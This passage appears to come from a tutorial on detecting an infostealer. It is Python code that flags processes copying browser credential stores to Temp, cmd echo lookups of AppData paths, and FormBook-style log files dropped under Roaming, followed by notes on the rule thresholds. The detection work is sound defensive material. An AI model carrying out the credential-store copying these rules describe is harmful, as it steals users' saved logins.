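    for ev in events:
        if ev["type"] == "process":
            cl = ev["cmdline"]
            if (COPY_RE.search(cl) and TEMP_RE.search(cl)
                    and any(s in cl.lower() for s in CRED_STORES)):
                findings.append(("browser_credstore_copy_to_temp", ev["pid"]))
            if ECHO_APPDATA_RE.search(cl):
                findings.append(("cmd_echo_appdata_path_resolution", ev["pid"]))
        elif ev["type"] == "file":
            m = LOG_DROP_RE.search(ev["path"])
            if m:
                drops[(ev["pid"], m.group(1).upper())].add(m.group(2).lower())
    for (pid, _dirname), names in drops.items():
        if len(names) >= 3:
            findings.append(("formbook_style_log_drop", pid))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:36} pid={pid}")
```

The copy rule keys on the combination of `copy`, a credential-store file name and a Temp destination rather than on cmd.exe alone, so ordinary shell use does not trip it; the log-drop rule requires three distinct names in one directory so that a single stray `.ini` under Roaming is not enough.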